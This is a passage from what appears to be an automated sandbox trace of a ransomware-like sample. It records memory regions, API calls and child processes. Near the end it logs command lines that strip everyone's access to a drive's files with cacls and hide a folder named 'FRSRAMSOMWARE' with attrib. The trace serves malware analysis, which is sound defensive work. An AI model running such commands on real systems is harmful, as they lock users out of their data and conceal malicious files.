entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1182 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1183 start_va = 0x230000 end_va = 0x233fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1184 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 1185 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1186 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1187 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1188 start_va = 0x7f160000 end_va = 0x7f182fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f160000" filename = "" Region: id = 1189 start_va = 0x7f18b000 end_va = 0x7f18dfff entry_point = 0x0 region_type = private name = "private_0x000000007f18b000" filename = "" Region: id = 1190 start_va = 0x7f18e000 end_va = 0x7f18efff entry_point = 0x0 region_type = private name = "private_0x000000007f18e000" filename = "" Region: id = 1191 start_va = 0x7f18f000 end_va = 0x7f18ffff entry_point = 0x0 region_type = private name = "private_0x000000007f18f000" filename = "" Region: id = 1192 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1193 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1194 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1195 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1214 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1215 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1216 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1217 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1218 start_va = 0xb0000 end_va = 0xbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 1219 start_va = 0x260000 end_va = 0x2ddfff entry_point = 0x260000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1220 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1221 start_va = 0x6a0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1222 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1223 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1224 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1225 start_va = 0x7f060000 end_va = 0x7f15ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f060000" filename = "" Region: id = 1226 start_va = 0xc0000 end_va = 0xc3fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Thread: id = 32 os_tid = 0x5e4 [0036.820] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0036.820] __set_app_type (_Type=0x1) [0036.820] __p__fmode () returned 0x76ea1768 [0036.820] __p__commode () returned 0x76ea176c [0036.820] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0036.820] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0036.821] GetCurrentThreadId () returned 0x5e4 [0036.821] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5e4) returned 0x30 [0036.821] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.821] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0036.821] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.823] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0036.823] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fbec | out: phkResult=0x22fbec*=0x0) returned 0x2 [0036.823] VirtualQuery (in: lpAddress=0x22fbfb, lpBuffer=0x22fb94, dwLength=0x1c | out: lpBuffer=0x22fb94*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.823] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fb94, dwLength=0x1c | out: lpBuffer=0x22fb94*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0036.823] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fb94, dwLength=0x1c | out: lpBuffer=0x22fb94*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0036.823] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fb94, dwLength=0x1c | out: lpBuffer=0x22fb94*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.823] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fb94, dwLength=0x1c | out: lpBuffer=0x22fb94*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0036.823] GetConsoleOutputCP () returned 0x1b5 [0036.823] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.823] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0036.823] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.824] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.824] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.824] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.824] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.824] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.824] GetEnvironmentStringsW () returned 0x434058* [0036.824] FreeEnvironmentStringsA (penv="=") returned 1 [0036.824] GetEnvironmentStringsW () returned 0x434058* [0036.824] FreeEnvironmentStringsA (penv="=") returned 1 [0036.824] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22eb3c | out: phkResult=0x22eb3c*=0x40) returned 0x0 [0036.824] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22eb44, lpData=0x22eb48, lpcbData=0x22eb40*=0x1000 | out: lpType=0x22eb44*=0x0, lpData=0x22eb48*=0xb2, lpcbData=0x22eb40*=0x1000) returned 0x2 [0036.824] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22eb44, lpData=0x22eb48, lpcbData=0x22eb40*=0x1000 | out: lpType=0x22eb44*=0x4, lpData=0x22eb48*=0x1, lpcbData=0x22eb40*=0x4) returned 0x0 [0036.824] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22eb44, lpData=0x22eb48, lpcbData=0x22eb40*=0x1000 | out: lpType=0x22eb44*=0x0, lpData=0x22eb48*=0x1, lpcbData=0x22eb40*=0x1000) returned 0x2 [0036.824] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22eb44, lpData=0x22eb48, lpcbData=0x22eb40*=0x1000 | out: lpType=0x22eb44*=0x4, lpData=0x22eb48*=0x0, lpcbData=0x22eb40*=0x4) returned 0x0 [0036.825] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22eb44, lpData=0x22eb48, lpcbData=0x22eb40*=0x1000 | out: lpType=0x22eb44*=0x4, lpData=0x22eb48*=0x40, lpcbData=0x22eb40*=0x4) returned 0x0 [0036.825] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22eb44, lpData=0x22eb48, lpcbData=0x22eb40*=0x1000 | out: lpType=0x22eb44*=0x4, lpData=0x22eb48*=0x40, lpcbData=0x22eb40*=0x4) returned 0x0 [0036.825] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22eb44, lpData=0x22eb48, lpcbData=0x22eb40*=0x1000 | out: lpType=0x22eb44*=0x0, lpData=0x22eb48*=0x40, lpcbData=0x22eb40*=0x1000) returned 0x2 [0036.825] RegCloseKey (hKey=0x40) returned 0x0 [0036.825] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22eb3c | out: phkResult=0x22eb3c*=0x40) returned 0x0 [0036.825] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22eb44, lpData=0x22eb48, lpcbData=0x22eb40*=0x1000 | out: lpType=0x22eb44*=0x0, lpData=0x22eb48*=0x40, lpcbData=0x22eb40*=0x1000) returned 0x2 [0036.825] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22eb44, lpData=0x22eb48, lpcbData=0x22eb40*=0x1000 | out: lpType=0x22eb44*=0x4, lpData=0x22eb48*=0x1, lpcbData=0x22eb40*=0x4) returned 0x0 [0036.825] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22eb44, lpData=0x22eb48, lpcbData=0x22eb40*=0x1000 | out: lpType=0x22eb44*=0x0, lpData=0x22eb48*=0x1, lpcbData=0x22eb40*=0x1000) returned 0x2 [0036.825] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22eb44, lpData=0x22eb48, lpcbData=0x22eb40*=0x1000 | out: lpType=0x22eb44*=0x4, lpData=0x22eb48*=0x0, lpcbData=0x22eb40*=0x4) returned 0x0 [0036.825] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22eb44, lpData=0x22eb48, lpcbData=0x22eb40*=0x1000 | out: lpType=0x22eb44*=0x4, lpData=0x22eb48*=0x9, lpcbData=0x22eb40*=0x4) returned 0x0 [0036.825] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22eb44, lpData=0x22eb48, lpcbData=0x22eb40*=0x1000 | out: lpType=0x22eb44*=0x4, lpData=0x22eb48*=0x9, lpcbData=0x22eb40*=0x4) returned 0x0 [0036.825] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22eb44, lpData=0x22eb48, lpcbData=0x22eb40*=0x1000 | out: lpType=0x22eb44*=0x0, lpData=0x22eb48*=0x9, lpcbData=0x22eb40*=0x1000) returned 0x2 [0036.825] RegCloseKey (hKey=0x40) returned 0x0 [0036.825] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa50050 [0036.825] srand (_Seed=0x5aa50050) [0036.825] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.825] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.825] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.825] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x434060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0036.825] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.825] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.825] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0036.825] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.826] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0036.826] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0036.826] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0036.826] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0036.826] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0036.826] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0036.826] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0036.826] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0036.826] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0036.826] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f91c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x22f91c, lpFilePart=0x22f918 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x22f918*="Desktop") returned 0x1c [0036.826] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.826] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f698 | out: lpFindFileData=0x22f698) returned 0x434270 [0036.826] FindClose (in: hFindFile=0x434270 | out: hFindFile=0x434270) returned 1 [0036.826] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x22f698 | out: lpFindFileData=0x22f698) returned 0x434270 [0036.826] FindClose (in: hFindFile=0x434270 | out: hFindFile=0x434270) returned 1 [0036.826] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0036.826] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x22f698 | out: lpFindFileData=0x22f698) returned 0x434270 [0036.827] FindClose (in: hFindFile=0x434270 | out: hFindFile=0x434270) returned 1 [0036.827] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.827] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0036.827] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0036.827] GetEnvironmentStringsW () returned 0x4360b0* [0036.827] FreeEnvironmentStringsA (penv="=") returned 1 [0036.827] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.827] GetConsoleOutputCP () returned 0x1b5 [0036.828] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.828] GetUserDefaultLCID () returned 0x409 [0036.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0036.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fa48, cchData=128 | out: lpLCData="0") returned 2 [0036.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fa48, cchData=128 | out: lpLCData="0") returned 2 [0036.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fa48, cchData=128 | out: lpLCData="1") returned 2 [0036.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0036.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0036.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0036.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0036.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0036.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0036.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0036.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0036.828] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0036.828] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0036.828] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0036.829] GetConsoleTitleW (in: lpConsoleTitle=0x434d78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.830] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.830] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0036.830] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0036.830] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0036.830] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.830] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.830] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.830] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.830] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.830] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.830] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.831] GetConsoleTitleW (in: lpConsoleTitle=0x22f738, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.831] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.831] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.831] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.831] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.832] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.832] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.832] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.832] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.832] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.832] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.832] _vsnwprintf (in: _Buffer=0x12c8840, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22f6f4 | out: _Buffer="y\r\n") returned 3 [0036.832] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.832] GetFileType (hFile=0x28) returned 0x3 [0036.832] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.832] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="y\r\n", cchWideChar=-1, lpMultiByteStr=0x12b6840, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\r\n", lpUsedDefaultChar=0x0) returned 4 [0036.833] WriteFile (in: hFile=0x28, lpBuffer=0x12b6840*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x22f6e4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesWritten=0x22f6e4*=0x3, lpOverlapped=0x0) returned 1 [0036.833] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.833] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.833] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.833] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.833] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.833] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.833] SetConsoleInputExeNameW () returned 0x1 [0036.833] GetConsoleOutputCP () returned 0x1b5 [0036.833] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.833] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.834] exit (_Code=0) Process: id = "31" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x4178000" os_pid = "0x6b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "cacls \"F:\\*.*\" /e /d everyone" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1196 start_va = 0x110000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1197 start_va = 0x130000 end_va = 0x131fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1198 start_va = 0x140000 end_va = 0x14efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1199 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1200 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1201 start_va = 0x1d0000 end_va = 0x1d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1202 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1203 start_va = 0x1f0000 end_va = 0x1f1fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1204 start_va = 0xb30000 end_va = 0xb39fff entry_point = 0xb30000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 1205 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1206 start_va = 0x7f670000 end_va = 0x7f692fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f670000" filename = "" Region: id = 1207 start_va = 0x7f696000 end_va = 0x7f696fff entry_point = 0x0 region_type = private name = "private_0x000000007f696000" filename = "" Region: id = 1208 start_va = 0x7f69c000 end_va = 0x7f69efff entry_point = 0x0 region_type = private name = "private_0x000000007f69c000" filename = "" Region: id = 1209 start_va = 0x7f69f000 end_va = 0x7f69ffff entry_point = 0x0 region_type = private name = "private_0x000000007f69f000" filename = "" Region: id = 1210 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1211 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1212 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1213 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1227 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1228 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1229 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1230 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 33 os_tid = 0x72c Process: id = "32" image_name = "attrib.exe" filename = "c:\\windows\\syswow64\\attrib.exe" page_root = "0x132c4000" os_pid = "0x810" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "attrib +s +a +h +r C:\\FRSRAMSOMWARE" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1231 start_va = 0xce0000 end_va = 